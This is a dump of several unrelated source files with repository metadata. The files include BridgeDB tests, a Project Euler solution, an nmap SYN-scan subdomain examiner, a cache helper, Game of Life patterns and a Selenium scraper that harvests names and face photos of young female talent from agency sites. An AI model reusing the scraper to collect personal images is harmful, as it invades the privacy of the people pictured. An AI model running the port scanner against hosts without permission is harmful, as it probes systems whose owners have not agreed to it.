self.assertTrue(hasPublicKey,
"obfs4 bridge line is missing 'public-key' PT arg.")
def test_get_obfs4_ipv4_nodeid(self):
"""Ask for obfs4 bridges and check that there is an 'node-id' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasNodeID = False
for arg in ptArgs:
if 'node-id' in arg:
hasNodeID = True
self.assertTrue(hasNodeID,
"obfs4 bridge line is missing 'node-id' PT arg.")
class _HTTPTranslationsTests(unittest.TestCase):
    """Build a TestCase with dynamic methods which tests all HTTP rendering of
    all translations in the bridgedb/i18n/ directory.

    The leading underscore keeps this class from being collected directly by
    the test runner; instances are created by createHTTPTranslationsTestSuite()
    after makeTestMethod() has attached one test per locale.
    """
    # Directory containing the compiled gettext catalogs, one subdir per locale.
    i18n = os.path.join(TOPDIR, 'bridgedb', 'i18n')
    def setUp(self):
        # These tests require a plaintext HTTP BridgeDB instance, which is
        # only available on CI; skip everywhere else.
        if not os.environ.get("CI"):
            raise SkipTest(("The mechanize tests cannot handle self-signed "
                            "TLS certificates, and thus require opening "
                            "another port for running a plaintext HTTP-only "
                            "BridgeDB webserver. Because of this, these tests "
                            "are only run on CI servers."))
        if not PID or not processExists(PID):
            raise FailTest("Could not start BridgeDB process on CI server!")
        self.br = None
    @classmethod
    def makeTestMethod(cls, locale):
        """Dynamically generate a test_ method for **locale**."""
        def test(self):
            pageArgs = '/?lang=%s' % locale
            # fallback=True means missing catalogs silently fall back to the
            # untranslated msgid, so English locales compare equal below.
            language = gettext.translation("bridgedb",
                                           localedir=self.i18n,
                                           languages=[locale,],
                                           fallback=True)
            expected = language.gettext("What are bridges?")
            if not locale.startswith('en'):
                # A non-English locale must actually translate the string.
                self.assertNotEqual(expected, "What are bridges?")
            self.openBrowser()
            self.br.open(HTTP_ROOT + pageArgs)
            self.assertSubstring(expected, self.br.response().read())
        # Rename the closure and attach it to the class so unittest can
        # discover/run it as test_<locale>.
        test.__name__ = 'test_%s' % locale
        setattr(cls, test.__name__, test)
        return test
    def tearDown(self):
        self.br = None
    def openBrowser(self):
        # Fresh mechanize browser per call; robots.txt handling disabled.
        self.br = mechanize.Browser()
        self.br.set_handle_robots(False)
    def test_self(self):
        # Placeholder so the class is never empty of statically-defined tests.
        self.assertTrue(self)
def createHTTPTranslationsTestSuite():
    """Build a TestSuite with one generated test case per translation found
    in the i18n directory (excluding the 'templates' subdirectory).

    Returns a single-element list holding the suite, the shape expected for
    the ``testSuites`` attribute consumed by DynamicTestCaseMeta.
    """
    suite = unittest.TestSuite()
    translations = os.listdir(_HTTPTranslationsTests.i18n)
    translations.remove('templates')
    for locale in translations:
        klass = _HTTPTranslationsTests
        method = klass.makeTestMethod(locale)
        # Bug fix: bind each case to its generated test method. Previously
        # ``klass()`` was used, which runs the default 'runTest' method that
        # does not exist on this class.
        case = klass(method.__name__)
        suite.addTest(case)
    return [suite,]
class HTTPTranslationsTests(unittest.TestCase):
    # NOTE(review): ``__metaclass__`` is Python 2 syntax; under Python 3 a
    # metaclass must be declared as ``class C(..., metaclass=...)`` and this
    # attribute has no effect -- confirm which interpreter runs this suite.
    __metaclass__ = DynamicTestCaseMeta
    # Shared result/suite objects consumed by DynamicTestCaseMeta when it
    # builds the concrete test methods for this class.
    testResult = TestResult()
    testSuites = createHTTPTranslationsTestSuite()
| 36.767606 | 82 | 0.605057 |
14971e35d62b0d7138554c9af3d9672897a7b897 | 1,251 | py | Python | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | # problem 12
# highly divisible triangle number
"""
The sequence of triangle numbers is generated by adding the natural numbers. So the 7th triangle number would be 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28. The first ten terms would be:
1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...
Let us list the factors of the first seven triangle numbers:
1: 1: 1
2: 3: 1,3
3: 6: 1,2,3,6
4: 10: 1,2,5,10
5: 15: 1,3,5,15
6: 21: 1,3,7,21
7: 28: 1,2,4,7,14,28
We can see that 28 is the first triangle number to have over five divisors.
What is the value of the first triangle number to have over five hundred divisors?
"""
import math
import functools as fn
fs_cache = {}
def factors(x):
    """Return the set of all positive divisors of x.

    Trial division up to sqrt(x): each divisor i found also contributes its
    complement x // i. The set is built directly, which avoids the original
    quadratic list concatenation via reduce(list.__add__, ...) and also
    handles the case of no divisor pairs (reduce() on an empty list raised
    TypeError, e.g. for x == 0).
    """
    divisors = set()
    for i in range(1, int(x ** 0.5) + 1):
        if x % i == 0:
            divisors.add(i)
            divisors.add(x // i)
    return divisors
nn_cache = {}
def natural_numbers(x):  # x is the index
    """Return the x-th triangle number: 0 + 1 + ... + x.

    Uses the closed form x*(x+1)/2 instead of the original memoized
    recursion, which could exceed Python's recursion limit for large x and
    grew the module-level nn_cache without bound. Same results for all
    non-negative x.
    """
    return x * (x + 1) // 2
# Scan successive triangle numbers until one has at least max_fs divisors,
# then print it (Project Euler problem 12 answer).
max_fs = 500
x = 0
l = 0
while l < max_fs:
    x += 1
    nat = natural_numbers(x)
    fs = list(factors(nat))
    l = len(fs)
print(nat)
| 25.02 | 174 | 0.61231 |
e13dcfb320f0c3fe2644c04cb861df86e94ccd07 | 964 | py | Python | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import socket
import nmap
# Module-level scanner instance shared by all examine() calls.
nm = nmap.PortScanner()
def examine(subdomain_data):
    """Resolve a subdomain and port-scan it with nmap.

    Returns a dict with "Hostname", "State" and a "Ports" list of
    {"portNumber", "portStatus"} entries. Returns an empty dict when the
    name does not resolve; returns a partial dict when the scanned host is
    absent from the results or has no open TCP ports.

    NOTE(review): '-sS' is an nmap SYN scan, which typically requires root
    privileges -- confirm the runtime environment.
    """
    try:
        ip_addr = socket.gethostbyname(subdomain_data)
    except socket.error:
        # Name did not resolve: nothing to scan.
        return {}
    print(f"[*] Examining {subdomain_data} | IP: {ip_addr}")
    # -Pn skips host discovery (treat host as up).
    nm.scan(subdomain_data, arguments='-sS -Pn')
    results = {}
    if ip_addr not in nm.all_hosts():
        print("[!] No ip_addr key found in nm scan object")
        return results
    results["Hostname"] = nm[ip_addr].hostname()
    results["State"] = nm[ip_addr].state()
    results["Ports"] = []
    if 'tcp' not in nm[ip_addr]:
        print("[!] No TCP ports open")
        return results
    for key in nm[ip_addr]['tcp'].keys():
        # print(nm[ip_addr]['tcp'][key])
        port_data = {
            "portNumber": key,
            "portStatus": nm[ip_addr]['tcp'][key]
        }
        results["Ports"].append(port_data)
    # print(results)
    return results
| 21.422222 | 60 | 0.58195 |
0c15373296cca0577e7e08b108c3bc9523d69392 | 787 | py | Python | src/localCacheHelper.py | gopaljigaur/github-gitea-mirror | de3b97ef9fd36fd352f94ceee7e79de02cc6ebef | [
"MIT"
] | 79 | 2020-10-14T03:05:45.000Z | 2022-03-27T01:07:52.000Z | src/localCacheHelper.py | Ta180m/github-gitea-mirror | 0238264eda182f8ad946a28a95405297ef12e6e7 | [
"MIT"
] | 2 | 2021-02-20T01:26:07.000Z | 2021-03-16T00:52:06.000Z | src/localCacheHelper.py | Ta180m/github-gitea-mirror | 0238264eda182f8ad946a28a95405297ef12e6e7 | [
"MIT"
] | 12 | 2020-10-18T01:31:47.000Z | 2021-11-09T23:44:57.000Z | #!/usr/bin/env python
giteaExistsRepos = dict()
from helper import logError,log,getConfig
import json
config = getConfig()
def writeLocalCache(content):
    """Serialize `content` as pretty-printed JSON to the configured cache file.

    Failures are logged (not raised) so a broken cache never aborts a mirror run.
    """
    try:
        with open(config['local_cache']['file_path'], 'w') as file:
            file.write(json.dumps(content, indent=4, sort_keys=True))
    # Narrowed from a bare `except:`: only file-system errors and
    # non-serializable content are expected here; anything else (including
    # KeyboardInterrupt/SystemExit) should propagate.
    except (OSError, TypeError, ValueError):
        logError('Unable To Save Local Cache !')
def readLocalCache():
    """Load and return the JSON cache file as a dict.

    Returns an empty dict when the file is missing, unreadable, or not
    valid JSON; the failure is logged rather than raised.
    """
    try:
        with open(config['local_cache']['file_path'], 'r') as file:
            filedata = file.read()
            return json.loads(filedata)
    # Narrowed from a bare `except:`: OSError covers missing/unreadable
    # files, ValueError covers json.JSONDecodeError; other exceptions
    # (e.g. KeyboardInterrupt) should propagate.
    except (OSError, ValueError):
        logError('Local Cache File Not Found ! / Unable To Ready It')
        return dict()
# In-memory mirror of the on-disk cache, loaded once at import time.
giteaExistsRepos = readLocalCache()
# Feature flag read from config: whether the local cache is enabled at all.
useLocalCache = config['local_cache']['enabled']
def saveLocalCache():
    """Persist the in-memory giteaExistsRepos mapping back to the cache file."""
    writeLocalCache(giteaExistsRepos)
16ac304ce55b96016d40f933b1cd1fa5c54010cf | 49 | py | Python | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | 1 | 2021-06-25T13:34:34.000Z | 2021-06-25T13:34:34.000Z | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | null | null | null | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | null | null | null | from main import updater
updater.start_polling()
| 16.333333 | 24 | 0.836735 |
1b6950adf8b6c7ced97378a31a9e12cfb8dd1e22 | 714 | py | Python | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-04-20 19:29
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Skiresort',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(null=True, srid=21781)),
],
options={
'db_table': 'ski resorts',
},
),
]
| 26.444444 | 114 | 0.57423 |
57eb8a85e570bac30dfcf3bcaaa4800c167fd1f1 | 2,023 | py | Python | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null |
# Conway's Game of Life seed patterns, keyed by name. Each value is a list
# of live-cell coordinate pairs; presumably [row, column] offsets relative
# to the pattern's top-left corner -- TODO confirm against the consumer.
patternsDict = {
    ########## STILL LIFES ##########
    "Block" : [
        [0,0],
        [0,1],
        [1,0],
        [1,1],
    ],
    "BeeHive" : [
        [0,1],
        [0,2],
        [1,0],
        [1,3],
        [2,1],
        [2,2]
    ],
    "Loaf" : [
        [0,1],
        [0,2],
        [1,0],
        [1,3],
        [2,1],
        [2,3],
        [3,2]
    ],
    "Boat" : [
        [0,0],
        [0,1],
        [1,0],
        [1,2],
        [2,1]
    ],
    "Tub" : [
        [0,1],
        [1,0],
        [1,2],
        [2,1]
    ],
    ########## OSCILLATORS ##########
    "Blinker" : [
        [1,0],
        [1,1],
        [1,2],
    ],
    "Toad" : [
        [1,1],
        [1,2],
        [1,3],
        [2,0],
        [2,1],
        [2,2],
    ],
    "Beacon" : [
        [0,0],
        [0,1],
        [1,0],
        [2,3],
        [3,2],
        [3,3],
    ],
    "Pulsar" : [
        [2,0],
        [3,0],
        [4,0],
        [8,0],
        [9,0],
        [10,0],
        [2,5],
        [3,5],
        [4,5],
        [8,5],
        [9,5],
        [10,5],
        [2,7],
        [3,7],
        [4,7],
        [8,7],
        [9,7],
        [10,7],
        [2,12],
        [3,12],
        [4,12],
        [8,12],
        [9,12],
        [10,12],
        [0,2],
        [0,3],
        [0,4],
        [0,8],
        [0,9],
        [0,10],
        [5,2],
        [5,3],
        [5,4],
        [5,8],
        [5,9],
        [5,10],
        [7,2],
        [7,3],
        [7,4],
        [7,8],
        [7,9],
        [7,10],
        [12,2],
        [12,3],
        [12,4],
        [12,8],
        [12,9],
        [12,10],
    ],
    ##### SPACESHIPS #####
    "Glider" : [
        [1,0],
        [0,2],
        [1,2],
        [2,2],
        [2,1],
    ],
    "HeavySpaceship" : [
        [1,0],
        [3,0],
        [0,1],
        [0,2],
        [4,2],
        [0,3],
        [4,3],
        [0,4],
        [0,5],
        [3,5],
        [0,6],
        [1,6],
        [2,6],
    ],
    ########## GUNS ##########
    "GosperGun" : [
        [4,0],
        [5,0],
        [4,1],
        [5,1],
        [4,10],
        [5,10],
        [6,10],
        [3,11],
        [7,11],
        [2,12],
        [8,12],
        [2,13],
        [8,13],
        [5,14],
        [3,15],
        [7,15],
        [4,16],
        [5,16],
        [6,16],
        [7,17],
        [2,20],
        [3,20],
        [4,20],
        [2,21],
        [3,21],
        [4,21],
        [1,22],
        [5,22],
        [0,24],
        [1,24],
        [5,24],
        [6,24],
        [2,34],
        [3,34],
        [2,35],
        [3,35],
    ],
    ########## METHUSELAHS ##########
    "Diehard" : [
        [0,6],
        [1,0],
        [1,1],
        [2,1],
        [2,5],
        [2,6],
        [2,7],
    ],
    "Acorn" : [
        [0,1],
        [1,3],
        [2,0],
        [2,1],
        [2,4],
        [2,5],
        [2,6],
    ],
    "Engine1" : [
        [0,6],
        [1,4],
        [1,6],
        [1,7],
        [2,4],
        [2,6],
        [3,4],
        [4,2],
        [5,0],
        [5,2],
    ],
}
4138f48ac5f9a52e6af1b2580158f3b540e7fb8f | 236 | py | Python | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 30 | 2021-02-02T20:17:44.000Z | 2022-03-27T09:17:32.000Z | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 14 | 2021-03-08T19:54:31.000Z | 2022-03-12T20:32:30.000Z | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 12 | 2021-07-08T18:50:27.000Z | 2022-03-11T17:10:35.000Z | from util.config_utils import configured_projects
"""Used from deploy.sh"""
def print_included_projects():
    """Print the configured project IDs as one space-delimited line.

    The output is consumed by deploy.sh, so the format must stay a single
    space-separated line on stdout.
    """
    print(" ".join(configured_projects()))
if __name__ == "__main__":
    # Script entry point used by deploy.sh.
    print_included_projects()
| 18.153846 | 49 | 0.728814 |
92d69cb542072d873d7405a9dfcc32e2741e410a | 97 | py | Python | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | class Base(object):
def __init__(self, *args, **kwargs):
super(Base, self).__init__() | 32.333333 | 40 | 0.628866 |
e05d0bbdf0b21919d0490cfbd0a72f9948288ccf | 271 | py | Python | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | import re
# Simplified email pattern (a practical subset, not the full RFC 5322 grammar):
# local part of alphanumerics/._+- , an '@', and a dotted domain.
EMAIL_RFC5322 = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")
def is_valid_email(candidate):
    """Return True if `candidate` looks like a valid email address.

    Pattern courtesy of: https://emailregex.com/
    Bug fix: previously returned the re.Match object (or None) instead of a
    boolean; callers now get a plain True/False while truthiness is preserved.
    """
    return EMAIL_RFC5322.match(candidate) is not None
| 20.846154 | 81 | 0.634686 |
dc55648719ae3e1f72b5fbb4668d5a1e9001f2ba | 229 | py | Python | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | 3 | 2021-06-07T16:17:35.000Z | 2021-12-31T20:28:36.000Z | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | null | null | null | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | 2 | 2021-07-06T04:42:22.000Z | 2022-03-06T06:19:31.000Z | from machine import Pin
from time import sleep
# GP4 - IN
# MicroPython script (Raspberry Pi Pico): drives a relay module's IN pin
# from GP4, toggling it on/off every 5 seconds forever.
relay_pin = Pin(4, Pin.OUT)
while True:
    print("turn on relay!")
    relay_pin.value(1)
    sleep(5)
    print("turn off relay!")
    relay_pin.value(0)
    sleep(5)
d2b717e2157ac020a91cee3be3b2188b74ec16cc | 3,560 | py | Python | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | 1 | 2021-07-12T09:23:15.000Z | 2021-07-12T09:23:15.000Z | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | null | null | null | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | null | null | null | from pathlib import Path
class FunctionPageCreator:
    """Generate a Markdown page tree for Power Query M functions.

    Reads an indented function list (headers flush-left, function names
    indented) and writes one directory + README per header and one .md
    stub page per function under ./functions/.
    """
    def __init__(self):
        # Input list file (headers + indented function names).
        self.function_list_filename = "power_m_functions.txt"
        # Root output directory for the generated pages.
        self.function_path = Path.cwd().joinpath("functions")
    def run(self):
        """Read the function list, then generate all pages."""
        self._read_function_list()
        self._create_function_pages()
    def _read_function_list(self):
        # Load the raw list text; parsing happens in _create_function_pages.
        with open(self.function_list_filename, "r") as function_list_file:
            self.function_list_raw = function_list_file.read()
        # print(self.function_list_raw)
    # TODO: Refactor this method by abstracting subroutines.
    def _create_function_pages(self):
        """Walk the list line by line, creating header dirs and function pages.

        Indented lines are function names under the most recent header line;
        NOTE(review): an indented line appearing before any header would hit
        `header_path` unassigned (NameError) -- the input file presumably
        always starts with a header.
        """
        self.function_list = dict()
        header_name = None
        for line in self.function_list_raw.split("\n"):
            if line.strip() == "":
                continue
            elif line.startswith("    "):
                # print(f"\tFunction: {line.strip()}")
                # Slugify the function name for its filename/URL.
                function_name = line.strip().replace(" ", "-").replace(".", "-").lower()
                if "#" in function_name:
                    # '#' appears in names like '#date'; 'sharp' matches the
                    # Microsoft Docs URL slugs, and the display text escapes it.
                    function_name = function_name.replace("#", "sharp")
                    line = line.replace("#", "\#")
                if "overview" in function_name:
                    continue
                function_page_path = header_path.joinpath(function_name + ".md")
                print(f"Creating function page at: {function_page_path}")
                if not function_page_path.exists():
                    function_page_path.touch()
                # Write (and overwrite) the stub page with front matter,
                # a Docs link, and empty Syntax/About sections.
                with open(function_page_path, "w") as function_page_file:
                    function_page_file.write("---\n")
                    function_page_file.write("---\n\n")
                    function_page_file.write(f"# {line.strip()}\n\n")
                    function_page_file.write(
                        f"Microsoft Docs: [{line.strip()}](https://docs.microsoft.com/en-us/powerquery-m/{function_name})\n\n"
                    )
                    function_page_file.write("## Syntax\n\n")
                    function_page_file.write("```powerquery-m\n")
                    function_page_file.write("Syntax for this function.\n")
                    function_page_file.write("```\n\n")
                    function_page_file.write("## About\n\n")
                    function_page_file.write("About this function.\n\n")
            else:
                # print(f"Header: {line.strip()}")
                # Header line: create its directory and a README index page.
                header_name = line.strip().replace(" ", "-").lower()
                # print(f"Creating header: {header_name}")
                header_path = self.function_path.joinpath(header_name)
                print(f"Creating header directory at: {header_path}")
                header_path.mkdir(exist_ok=True)
                readme_path = header_path.joinpath("README.md")
                print(f"Creating README at: {readme_path}")
                if not readme_path.exists():
                    readme_path.touch()
                with open(readme_path, "w") as readme_file:
                    readme_file.write("---\n")
                    readme_file.write("---\n\n")
                    readme_file.write(f"# {line.strip()}\n\n")
                    readme_file.write(
                        f"Microsoft Docs: [{line.strip()}](https://docs.microsoft.com/en-us/powerquery-m/{header_name})\n\n"
                    )
                    readme_file.write("About this function group.\n\n")
                    readme_file.write("{% include list.liquid all=true %}")
if __name__ == "__main__":
    # Script entry point: generate the full page tree.
    process = FunctionPageCreator()
    process.run()
| 38.27957 | 126 | 0.541011 |
e8339c2606980e8c155c85c496f4ce65737d5265 | 18,492 | py | Python | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | null | null | null | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | 6 | 2021-03-31T20:04:14.000Z | 2022-03-12T00:44:56.000Z | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 YA-androidapp(https://github.com/YA-androidapp) All rights reserved.
# pip install icrawler
# pip install opencv-python opencv-contrib-python
# pip install selenium
from bs4 import BeautifulSoup
from icrawler.builtin import BingImageCrawler
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from seleniumrequests import Firefox
import codecs
import cv2
import datetime
import numpy as np
import os
import re
import requests
import tempfile
import time
import urllib.parse
import urllib.request
# Run relative to this script's directory (note: chdir happens at import time).
currentdirectory = os.path.dirname(os.path.abspath(__file__))
os.chdir(currentdirectory)
print(os.getcwd())
# Search parameters (age range sent to both sites' search forms).
AGE_MIN = 18
AGE_MAX = 30
# Constants: per-run output files are timestamped at import time.
DATA_FILEPATH = os.path.join(
    currentdirectory, 'data', 'dat_'+datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.txt')
LOG_FILEPATH = os.path.join(
    currentdirectory, 'data', 'log_'+datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.txt')
# OpenCV frontal-face Haar cascade used for face cropping.
HAARCASCADE_PATH = 'sources/data/haarcascades/haarcascade_frontalface_default.xml'
faceCascadeClassifier = cv2.CascadeClassifier(HAARCASCADE_PATH)
# Downloaded image / temp directories.
PHOTO_DIRPATH = os.path.join(currentdirectory, 'data', 'img')
TEMP_DIRPATH = os.path.join(currentdirectory, 'data', 'temp')
# Results shown per page on the target sites.
PERSONS_PER_PAGE = 20
# Explicit-wait timeout (passed to WebDriverWait) and delay between crawls.
WAITING_TIME = 2000
WAITING_TIME_SEARCH = 10
# URI
baseUris = [
    # https://www.talent-databank.co.jp/guideline/index.html
    'https://www.talent-databank.co.jp',
    'https://talemecasting-next.com' # https://talemecasting-next.com/agreement
]
targetUris = [
    'https://www.talent-databank.co.jp/',
    'https://talemecasting-next.com/talent?sex_flg%5B%5D=1&genre%5B%5D=11&genre%5B%5D=12&genre%5B%5D=13&genre%5B%5D=15&genre%5B%5D=16&genre%5B%5D=17&genre%5B%5D=19&genre%5B%5D=20&age_min=' +
    str(AGE_MIN)+'&age_max='+str(AGE_MAX)
]
# # カテゴリ毎に、取得するページ数
# MAX_PAGE = [
# 20,
# 20
# ]
def get_filepath():
    """Build an absolute path for a timestamped screenshot file
    (screen_YYYYmmddHHMMSS.png) inside the script directory."""
    stamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
    return os.path.join(currentdirectory, 'screen_{}.png'.format(stamp))
def imread2(filename, flags=cv2.IMREAD_COLOR, dtype=np.uint8):
    """Unicode-path-safe replacement for cv2.imread.

    Reads the file via numpy (which handles non-ASCII paths on Windows)
    and decodes it with cv2.imdecode. Returns None on any failure.
    """
    try:
        raw = np.fromfile(filename, dtype)
        return cv2.imdecode(raw, flags)
    except Exception as e:
        print(e)
        return None
def imwrite2(filename, img, params=None):
    """Unicode-path-safe replacement for cv2.imwrite.

    Encodes with cv2.imencode and writes the buffer via ndarray.tofile,
    which handles non-ASCII paths on Windows. Returns True on success,
    False on encode failure or any exception.
    """
    try:
        extension = os.path.splitext(filename)[1]
        ok, encoded = cv2.imencode(extension, img, params)
        if not ok:
            return False
        with open(filename, mode='w+b') as f:
            encoded.tofile(f)
        return True
    except Exception as e:
        print(e)
        return False
def collect():
    """Scrape both talent sites and return a list of 'name genre' strings.

    Side effects: rotates data/img to a .bak, appends records to
    DATA_FILEPATH, appends progress to LOG_FILEPATH, downloads profile
    images via download_img(), and drives a local Firefox/geckodriver
    (Windows-specific hard-coded paths).
    """
    result_names = []
    os.makedirs(os.path.join(currentdirectory, 'data'), exist_ok=True)
    # Rotate any previous image directory out of the way before this run.
    if os.path.exists(PHOTO_DIRPATH):
        nowstr = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        os.rename(PHOTO_DIRPATH, PHOTO_DIRPATH + '_' + nowstr + '.bak')
    os.makedirs(PHOTO_DIRPATH, exist_ok=True)
    with open(DATA_FILEPATH, 'a', encoding='utf-8') as datafile:
        with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
            print('\tcollect() Start: {}'.format(
                datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
            # Hard-coded local Firefox binary/profile and geckodriver paths.
            binary = FirefoxBinary(
                'C:\\Program Files\\Mozilla Firefox\\firefox.exe')
            profile = FirefoxProfile(
                'C:\\Users\\y\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\mv060idd.default')
            fox = webdriver.Firefox(
                firefox_profile=profile,
                firefox_binary=binary,
                executable_path='C:\\geckodriver\\geckodriver.exe'
            )
            fox.set_page_load_timeout(6000)
            try:
                fox.set_window_size(1280, 720)
                # --- Site 1: talent-databank ---
                baseUri = baseUris[0]
                targetUri = targetUris[0]
                print('\tcollect() baseUri: {} {}'.format(
                    baseUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                print('\tcollect() targetUri: {} {}'.format(
                    targetUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                # Fill in the search criteria on the top page.
                fox.get(targetUri)
                time.sleep(1)
                WebDriverWait(fox, WAITING_TIME).until(
                    EC.presence_of_element_located((By.XPATH, '//body')))
                print('\tcollect() body', file=logfile, flush=True)
                # Check the "female" checkbox.
                clickSelector(fox, 'input[type="checkbox"][value="female"]')
                # # 「タレント・俳優・女優」(最初の要素)の「もっと詳しく」
                # clickLink(fox, 'もっと詳しく')
                # # 「女優」
                # clickSelector(fox, 'input[type="checkbox"][value=":女優"]')
                # Genre checkboxes: talent/actor/actress, music, sports,
                # speaking jobs, model.
                clickSelector(
                    fox, 'input[type="checkbox"][value="タレント,俳優,女優"]')
                clickSelector(fox, 'input[type="checkbox"][value="音楽"]')
                clickSelector(fox, 'input[type="checkbox"][value="スポーツ"]')
                clickSelector(fox, 'input[type="checkbox"][value="話す仕事"]')
                clickSelector(fox, 'input[type="checkbox"][value="モデル"]')
                # Age range fields.
                clearAndSendKeys(fox, 'age_min', str(AGE_MIN))
                clearAndSendKeys(fox, 'age_max', str(AGE_MAX))
                # Submit via the "search with all conditions" image button.
                clickSelector(
                    fox, 'input[type="image"][src="img/top_search_btn.jpg"]')
                # First page of search results.
                time.sleep(1)
                WebDriverWait(fox, WAITING_TIME).until(
                    EC.presence_of_element_located((By.XPATH, '//body')))
                print('\tcollect() body', file=logfile, flush=True)
                source = fox.page_source
                bs = BeautifulSoup(source, 'lxml')
                print('\tcollect() bs', file=logfile, flush=True)
                searchnavi_total = bs.find_all(
                    'span', class_=re.compile('searchnavi_total'))
                if len(searchnavi_total) == 0:
                    return
                count_all = int(searchnavi_total[0].text)
